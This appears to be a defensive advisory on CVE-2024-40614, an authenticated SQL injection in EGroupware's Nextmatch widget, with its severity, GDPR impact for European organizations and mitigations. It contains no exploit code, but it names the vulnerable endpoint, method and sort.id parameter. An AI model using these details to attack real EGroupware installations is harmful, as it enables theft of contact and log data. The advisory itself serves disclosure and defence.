CVE-2024-40614 is a SQL injection vulnerability identified in EGroupware, an open-source groupware software suite widely used for collaboration and information management. The flaw exists in versions prior to 23.1.20240624, specifically in the handling of the ORDER BY clause within the ajax_get_rows method of the Nextmatch widget, which is responsible for sorting entries in the Address Book and InfoLog modules. The vulnerability stems from insufficient sanitization of the sort.id parameter passed via the json.php endpoint with the menuaction parameter set to EGroupware\Api\Etemplate\Widget\Nextmatch::ajax_get_rows. Authenticated users can craft malicious input to manipulate the SQL query, leading to unauthorized disclosure of sensitive information stored in the backend database. The CVSS v3.1 base score is 6.5, reflecting a medium severity level with network attack vector, low attack complexity, and requiring privileges (authenticated user) but no user interaction. The vulnerability impacts confidentiality but does not affect data integrity or availability. No public exploit code or active exploitation has been reported to date. The lack of a patch link suggests that users should monitor official EGroupware channels for updates or apply available security advisories promptly.

For European organizations using EGroupware for internal communication, contact management, or logging, this vulnerability poses a risk of unauthorized data disclosure. Attackers with valid user credentials could exploit the flaw to extract sensitive information from Address Book or InfoLog databases, potentially exposing personal data, business contacts, or confidential logs. This could lead to privacy violations under GDPR, reputational damage, and potential regulatory penalties. Since the vulnerability requires authentication, the risk is somewhat mitigated by internal access controls, but insider threats or compromised accounts increase exposure. The lack of impact on data integrity or availability reduces the risk of service disruption or data manipulation. However, the confidentiality breach alone is significant for organizations handling sensitive or regulated data.

European organizations should immediately verify their EGroupware version and upgrade to 23.1.20240624 or later once available. Until patched, restrict access to EGroupware to trusted users and networks, enforce strong authentication mechanisms including multi-factor authentication to reduce risk of account compromise, and monitor logs for unusual query patterns or access attempts to json.php endpoints. Implement web application firewalls (WAF) with SQL injection detection rules tailored to EGroupware traffic to block malicious payloads targeting the sort.id parameter. Conduct regular security audits and penetration testing focusing on authenticated user input handling. Educate users about the risks of credential sharing and phishing to minimize unauthorized access. Finally, maintain up-to-date backups and incident response plans to quickly address any potential data breaches.